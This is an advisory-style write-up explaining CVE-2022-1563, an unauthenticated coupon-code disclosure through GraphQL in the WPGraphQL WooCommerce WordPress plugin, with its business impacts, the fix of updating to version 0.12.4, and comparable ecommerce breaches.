Attack Vectors

WPGraphQL WooCommerce (slug: wp-graphql-woocommerce) has a medium-severity information disclosure issue (CVSS 5.3) affecting versions ≤ 0.12.3. Because the CVSS vector indicates no privileges and no user interaction are required (AV:N/PR:N/UI:N), an external attacker can target exposed GraphQL endpoints over the internet.

In practical terms, if your WordPress site uses WPGraphQL WooCommerce and exposes GraphQL queries, an unauthenticated actor may be able to query and extract coupon codes. This can be done remotely, at scale, and without logging into a customer or admin account.

Security Weakness

CVE-2022-1563 describes an information exposure weakness in WPGraphQL WooCommerce versions up to, and including, 0.12.3. The issue can allow unauthenticated access to data that should not be publicly retrievable—specifically, coupon codes obtainable via GraphQL queries.

This is not a “server hack” scenario; it’s a data-access control problem. Business owners should treat it as a governance and revenue-protection issue: sensitive promotional data is accessible in a way your marketing, finance, and compliance teams likely do not intend.

Remediation: Update WPGraphQL WooCommerce to version 0.12.4 or a newer patched version. Reference: Wordfence vulnerability advisory.

Technical or Business Impacts

Revenue leakage and margin erosion: If attackers extract coupon codes, they can be shared publicly or abused programmatically, leading to unexpected discounting, reduced campaign ROI, and complications in forecasting and revenue recognition.

Campaign disruption and brand risk: Marketing teams may have to pause or rework promotions, rotate codes, and respond to customer confusion if “private” codes spread widely. Even when no customer PII is exposed, customers and partners may perceive the incident as a loss of control over your ecommerce operations.

Fraud operations and operational overhead: Abuse of coupon codes can create spikes in low-margin orders, increase support tickets (pricing disputes, cancellations), and add burden to finance and operations teams for reconciliation and post-incident analysis.

Similar Attacks

While this vulnerability is specifically about coupon-code disclosure via GraphQL, it fits a broader pattern: attackers target ecommerce platforms for data exposure and monetizable abuse. Examples of real-world ecommerce-focused attacks include:

British Airways (Magecart-style card-skimming attack; ICO enforcement)
Ticketmaster UK (third-party script compromise impacting customer data; ICO enforcement)
Newegg (payment card skimming malware; KrebsOnSecurity)